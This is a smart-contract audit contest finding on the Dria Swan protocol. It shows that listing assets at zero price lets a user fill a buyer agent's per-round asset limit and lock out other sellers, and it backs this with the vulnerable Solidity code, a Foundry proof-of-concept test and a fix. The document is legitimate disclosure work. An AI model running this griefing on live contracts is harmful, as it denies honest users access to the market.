Dria

Swan

NFTHardhat

21,000 USDC

View results

Previous Next

Submission Details

Severity: medium

Valid

Malicious users can GRIEF BuyerAgents from buying other SwanAssets due to the lack of a minimum price

10ap17

Summary

In the Swan contract list function, assets can be listed for a price of zero. This enables a malicious user to exploit the lack of a minimum price by filling the maxAssetCount limit with worthless assets, effectively blocking the buyer from accessing valuable assets and preventing other users from listing assets for that buyer in the same round. This exploit limits the buyer's options and disrupts other users’ ability to participate.

Vulnerability Details

The vulnerability exists in the list function of the Swan contract, where there is no restriction on the minimum price for assets that can be listed. This absence of a minimum price allows a malicious user to repeatedly list assets at 0 price. By doing so, the malicious user can fill the maxAssetCount limit for a given BuyerAgent with assets that hold no real value.

This action effectively prevents the buyer from accessing assets they may actually need, leaving them only with spam listings that provide no utility. Additionally, this setup blocks honest users from listing their assets for the same buyer in the current round, as the asset limit has already been met with valueless entries. This exploit not only causes grief to the buyer by limiting their options to spam assets but also impacts other users by preventing them from participating in the asset listing process for that buyer.

function list(string calldata _name, string calldata _symbol, bytes calldata _desc, uint256 _price, address _buyer)

external

{

BuyerAgent buyer = BuyerAgent(_buyer);

(uint256 round, BuyerAgent.Phase phase,) = buyer.getRoundPhase();

// buyer must be in the sell phase

if (phase != BuyerAgent.Phase.Sell) {

revert BuyerAgent.InvalidPhase(phase, BuyerAgent.Phase.Sell);

}

// asset count must not exceed `maxAssetCount`

if (getCurrentMarketParameters().maxAssetCount == assetsPerBuyerRound[_buyer][round].length) {

revert AssetLimitExceeded(getCurrentMarketParameters().maxAssetCount);

}

// all is well, create the asset & its listing

address asset = address(swanAssetFactory.deploy(_name, _symbol, _desc, msg.sender));

listings[asset] = AssetListing({

createdAt: block.timestamp,

royaltyFee: buyer.royaltyFee(),

price: _price,

seller: msg.sender,

status: AssetStatus.Listed,

buyer: _buyer,

round: round

});

// add this to list of listings for the buyer for this round

assetsPerBuyerRound[_buyer][round].push(asset);

// transfer royalties

transferRoyalties(listings[asset]);

emit AssetListed(msg.sender, asset, _price);

}

PoC

To demonstrate this vulnerability, we create a mock ERC20 token (MockERC20) to serve as the token used in the Swan protocol.

import "../lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";

contract MockERC20 is ERC20{

constructor() ERC20("WETH", "WETH"){}

}

Then, we set up the test file as shown below.

In the test file TestVuln, a malicious user is able to list multiple assets with a price of zero, allowing them to avoid paying any protocol fees. By listing assets with a zero price, this malicious user fills the maxAssetCount limit — the maximum number of assets that can be listed for a given BuyerAgent in one round. As a result, the BuyerAgent is left with assets of no value, effectively preventing them from acquiring any assets they might actually want or could use. Additionally, this prevents other users from selling assets to this BuyerAgent.

import "../src/Swan.sol";

import "../src/MockERC20.sol";

import "forge-std/Test.sol";

contract TestVuln is Test{

// Setting up SwanMarketParameters and LLMOracleTaskParameters

SwanMarketParameters public swanMarketParameters = SwanMarketParameters({

withdrawInterval: 1800,

sellInterval: 3600,

buyInterval: 600,

platformFee: 1,

maxAssetCount: 5,

timestamp: 0

});

LLMOracleTaskParameters public llmOracleTaskParams = LLMOracleTaskParameters({

difficulty: 1,

numGenerations: 1,

numValidations: 1

});

Swan swan;

LLMOracleCoordinator coordinator;

BuyerAgentFactory buyerFactory;

SwanAssetFactory swanFactory;

MockERC20 token;

BuyerAgent buyer;

function setUp()external{

coordinator= new LLMOracleCoordinator();

buyerFactory= new BuyerAgentFactory();

swanFactory= new SwanAssetFactory();

token= new MockERC20();

swan = new Swan();

swan.initialize(swanMarketParameters, llmOracleTaskParams, address(coordinator), address(token), address(buyerFactory), address(swanFactory));

buyer= swan.createBuyer("name", "desc", 10, 5e18);

}

function test_Vulnerability()external{

address maliciousUser= makeAddr("maliciousUser");

// Starting a simulated transaction from 'maliciousUser' to list assets

vm.startPrank(maliciousUser);

// The maliciousUser lists 5 assets (up to the maximum allowed count) with a 0 price, filling up the buyer’s asset capacity.

// This prevents any other users from listing new assets for the buyer, leaving the buyer with no value assets.

for(uint256 i; i<swanMarketParameters.maxAssetCount; i++){

swan.list("name","symbol","desc", 0, address(buyer));

}

vm.stopPrank();

address otherUser = makeAddr("otherUser");

// Another user ('otherUser') now tries to list a new asset for the same buyer

vm.prank(otherUser);

vm.expectRevert();// The transaction will revert since the 'maliciousUser' has already filled the maxAssetCount for this buyer

swan.list("name1","symbol1","desc1",15, address(buyer));

}

*Remove _disableInitializers() from the Swan and SwanManager contracts in order for this test code to work.

After running the test with forge test, we can observe that the test passes, indicating that the vulnerability is present and can be exploited to grief the buyer and other users.

forge test

[⠊] Compiling...

No files changed, compilation skipped

Ran 1 test for test/TestVuln.t.sol:TestVuln

[PASS] test_Vulnerability() (gas: 6325813)

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.28ms (1.16ms CPU time)

Ran 1 test suite in 5.47ms (2.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

Impact

The impact of this vulnerability is that malicious users, due to the lack of a minimum price requirement for assets, can spam listings of assets with no value. By setting the price of these assets to zero, they can list them without paying any protocol fees. This fills the maxAssetCount limit for a given BuyerAgent, effectively preventing buyers from purchasing valuable assets that align with their needs or preferences, as the available asset slots are occupied by spam listings. Additionally, this prevents other users from listing assets for the same buyer in the current round.

Tools Used

Manual Code Review
Foundry

Recommendations

Consider adding a minimum price requirement in the list and relist function. This requirement would create a cost barrier, disincentivizing malicious users from exploiting the system by requiring them to pay a protocol fee as well, making spam or griefing attacks less appealing.

Updates

Lead Judging Commences

inallhonesty Lead Judge 9 months ago

Submission Judgement Published

Validated

Assigned finding tags:

DOS the buyer / Lack of minimal amount of listing price

Prize pool breakdown

Total prize

21,000 USDC

nSLOC

1,034

20 USDC / LOC

High Medium

20,000 USDC

Low

1,000 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.